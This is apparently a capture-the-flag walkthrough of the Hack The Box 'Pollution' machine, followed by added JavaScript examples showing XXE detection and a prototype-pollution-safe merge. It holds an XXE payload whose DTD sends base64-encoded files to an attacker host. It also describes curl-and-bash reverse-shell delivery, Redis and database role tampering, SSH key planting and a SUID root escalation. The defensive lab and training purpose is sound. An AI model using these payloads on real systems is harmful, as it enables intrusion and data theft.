- What will you gain from the Pollution machine?
- Information Gathering on Pollution Machine
- Enumerate the subdomain "forum.collect.htb"
- XXE attack on the machine
- Redis-Cli command
- Enumerate the MySQL database
- Another method to get a foothold on pollution machine
- Escalate to Root Privileges Access
- Extra Information
In this post, I would like to share a walkthrough of the Pollution machine from Hack The Box.
This machine is rated Hard on Hack The Box.
What will you gain from the Pollution machine?
For the user flag, you will need to enumerate the website via Burp Suite and find an attachment that contains a token, which we can use to obtain admin privileges on the website. With admin access, we can execute an XML external entity (XXE) injection. We can also gain access to the Redis server, which we can modify to get access to the developers' site. Once we are on the developers' site, we can use PHP filter injection to obtain a reverse shell connection.
As for the root flag, you need to exploit a prototype pollution vulnerability, which gives us code execution and a root shell.
Information Gathering on Pollution Machine
Once we have started the VPN connection (the configuration file is downloaded from Hack The Box), we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Let's access the website interface.
On the website interface, there is not much apart from the login and register functions.
Therefore, let's register a new account as shown in the screenshot above.
Let's try to log in with the credentials that we created earlier.
As a result, we have successfully accessed the home page, which confirms that registration and login worked.
From the gobuster output, we have identified the subdomains forum.collect.htb and developers.collect.htb.
The screenshot above shows the website interface for the forum.
Sadly, we don't have any credentials that we can use to log in here.
Enumerate the subdomain “forum.collect.htb”
When we analyze the forum page, I notice that there are a few users listed in the member list.
Let's register a username on the forum website.
Finally, we have successfully registered and logged in to the forum's dashboard.
There is one message on the forum, by Victor, which reads roughly "I am unable to login to the Pollution API".
As shown in the screenshot above, Victor left an attachment, proxy_history.
Inside the proxy_history file, I found a base64-encoded request which could be useful to us.
We have obtained the packet that sets the admin role.
The screenshot above shows the original packet for collect.htb.
We should set our account role to admin via Burp Suite.
At last, we managed to access the admin page on collect.htb.
The screenshot above shows the same page in the browser.
XXE attack on the machine
The website interface has an XXE vulnerability that we can take advantage of.
The user already exists.
Let's start our Python web server on our own machine.
<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../index.php'>
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://<IP ADDRESS>/?file=%file;'>">
%eval;
%exfiltrate;
The DTD file can be written as shown above.
We then execute the XXE attack with the payload shown below, which loads that DTD from our Python web server.
manage_api=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<IP ADDRESS>/dark.dtd"> %xxe;]><root> <method>POST</method><uri>/auth/register</uri><user><username>mrk1</username><password>mrk</password></user></root>
By changing the resource path in the DTD, we can adapt the payload to retrieve any readable file from the target and have it sent to our attacker's machine.
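The payload above only works because the API hands an attacker-controlled XML body, DOCTYPE and all, to a parser that resolves external parameter entities. As an added example (not code from the write-up or from the machine), the following Node.js pre-check flags request bodies that carry DOCTYPE or ENTITY declarations before they reach any XML library; the pattern names, the parseManageApi helper and the two sample bodies are constructed for this demonstration.

```javascript
// Added example, not the Pollution machine's code: reject DTD constructs in XML request
// bodies before parsing. Pattern list, helper names and sample bodies are constructed.

const DANGEROUS_PATTERNS = [
  { name: 'doctype',            re: /<!DOCTYPE\b/i },
  { name: 'entity-declaration', re: /<!ENTITY\b/i },
  { name: 'parameter-entity',   re: /<!ENTITY\s+%/i },       // "<!ENTITY % name ..." as in the payload above
  { name: 'external-entity',    re: /\bSYSTEM\s+["']/i },    // SYSTEM "http://..." or SYSTEM 'file:...'
  { name: 'php-filter-wrapper', re: /php:\/\/filter/i },     // only visible when the DTD is inline
];

// Returns which patterns matched; an empty list means the body carries no DTD constructs.
function inspectXmlBody(body) {
  const findings = DANGEROUS_PATTERNS.filter(p => p.re.test(body)).map(p => p.name);
  return { safe: findings.length === 0, findings };
}

// Hypothetical handler for the manage_api parameter: refuse anything with a DTD, then pull
// out the two fields the endpoint actually needs (simple regexes, no entity processing).
function parseManageApi(body) {
  const verdict = inspectXmlBody(body);
  if (!verdict.safe) {
    return { accepted: false, reason: 'DTD/entity constructs rejected: ' + verdict.findings.join(', ') };
  }
  const method = (body.match(/<method>([^<]*)<\/method>/) || [])[1];
  const uri = (body.match(/<uri>([^<]*)<\/uri>/) || [])[1];
  if (!method || !uri) return { accepted: false, reason: 'missing method or uri element' };
  return { accepted: true, method, uri };
}

// Constructed sample bodies: a normal request and one shaped like the XXE payload above.
const BENIGN_BODY =
  '<?xml version="1.0" encoding="UTF-8"?><root><method>POST</method><uri>/auth/register</uri></root>';
const XXE_BODY =
  '<?xml version="1.0" encoding="UTF-8"?>' +
  '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://ATTACKER-IP-PLACEHOLDER/dark.dtd"> %xxe;]>' +
  '<root><method>POST</method><uri>/auth/register</uri></root>';

console.log(parseManageApi(BENIGN_BODY));
console.log(parseManageApi(XXE_BODY));
```

Note that the php://filter string never appears in the XXE body itself: it lives in the external DTD fetched from the attacker's server, so a body check can only see the DOCTYPE and the parameter-entity declaration. That is why the decisive control is refusing DOCTYPE declarations entirely (or disabling entity resolution in the parser), rather than searching for specific wrapper names.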
We managed to obtain a hash from the attack.
The hash has been identified as Apache MD5.
At last, we managed to crack the hash and obtain a password.
Redis-Cli command
Therefore, let's connect with the redis-cli command as shown in the screenshot above.
We should give our own user "darknite" the same permission that the admin has.
At last, we managed to access the dashboard using those credentials.
We are required to create a file that contains a reverse shell.
As a result, let's start our Python web server.
We should generate the PHP filter chain for phpinfo(), which we can use as a visible test.
Boom! The phpinfo() output is displayed, which confirms that the PHP filter chain works.
Let's try command injection for the same purpose.
As we expected, it works and gives the output "www-data".
Therefore, let's replace the command with one that curls our malicious file and executes it with bash.
Therefore, we managed to deliver the malicious file to the machine.
As a result, we have successfully accessed the machine via the reverse shell.
There are a bunch of PHP files that we can investigate.
Enumerate the MySQL database
From one of the PHP files, we found a password for the MySQL database.
At last, we can access the MySQL database with the credentials that we found earlier.
However, there is nothing that we can use in the MySQL database.
Looking at the ports that are open on the machine, I notice one port that is not commonly used.
We should transfer the fpm.py script, which we downloaded from here, to the machine.
By default, we should be able to execute the command above, but sadly it shows the error "File not found".
As a result, we should create the file "darknite.php".
Boom! We have command injection working on the machine.
Therefore, let's add our own SSH public key to the machine.
Finally, we managed to access the machine via the SSH service.
We can read the user flag by typing the "cat user.txt" command.
Another method to get a foothold on pollution machine
Sadly, it no longer worked when I tested the Python script before this writeup was released.
We can see that there is a user called Victor who runs bash.
We should create a bash file containing the contents shown above; the script can be found here.
As a result, we should be able to run the file in order to receive a reverse connection.
Finally, we managed to obtain the reverse shell connection back to us.
Escalate to Root Privileges Access
After roaming around the machine, I noticed a pollution_api directory that we can investigate later.
We can access the MySQL database again, but this time we will use the pollution_api database.
There are two tables; we can investigate the users table.
However, there is nothing useful in the users table, but we can change the roles instead.
The command above updates our account in the database from a normal user to the admin role.
We can trigger the vulnerability by running the "curl" command.
Boom! /bin/bash has been changed into a SUID binary, which we can use to get a root shell.
We can read the root flag by typing the "cat /root/root.txt" command.
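The root step relies on a prototype pollution bug in the API. As an added example that is not the Pollution API's code, here is the classic vulnerable recursive merge, the kind of request-body handling that makes a JSON key named "__proto__" pollute Object.prototype, beside a hardened version that refuses prototype-chain keys. The function names, the BLOCKED_KEYS list and the sample body are constructed for this demonstration.

```javascript
// Added example, not the machine's code: vulnerable deep merge vs. hardened deep merge.
// Helper names, BLOCKED_KEYS and POLLUTING_BODY are constructed for the demonstration.

// Vulnerable: recurses into target[key] for every key in source. When key is "__proto__",
// target["__proto__"] is Object.prototype, so attacker-supplied properties land on every object.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: keys that reach the prototype chain are skipped outright. JSON.parse creates
// "__proto__" as an own property, so it shows up in Object.keys and must be filtered here.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) ||
          typeof target[key] !== 'object' || target[key] === null) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed request body shaped like a prototype pollution attempt: a legitimate field
// plus a "__proto__" object that should never reach the prototype chain.
const POLLUTING_BODY = '{"role":"user","__proto__":{"polluted":"yes"}}';

// Runs one merge against a fresh config object and reports whether an unrelated, newly
// created object now sees the injected property. Cleans up so the next run starts clean.
function demonstrate(mergeFn) {
  const config = { role: 'guest' };
  mergeFn(config, JSON.parse(POLLUTING_BODY));
  const leaked = ({}).polluted;
  delete Object.prototype.polluted;
  return { role: config.role, leaked };
}

console.log('unsafeMerge:', demonstrate(unsafeMerge)); // leaked: 'yes'
console.log('safeMerge:  ', demonstrate(safeMerge));   // leaked: undefined
```

Skipping the three keys is the minimal fix; stronger options are to build merge targets with Object.create(null), to freeze Object.prototype at startup, or to validate request bodies against a schema so unexpected keys are never merged at all. The demonstrate() helper also doubles as a cheap runtime check: if a fresh {} ever reports a property it should not have, something upstream has polluted the prototype.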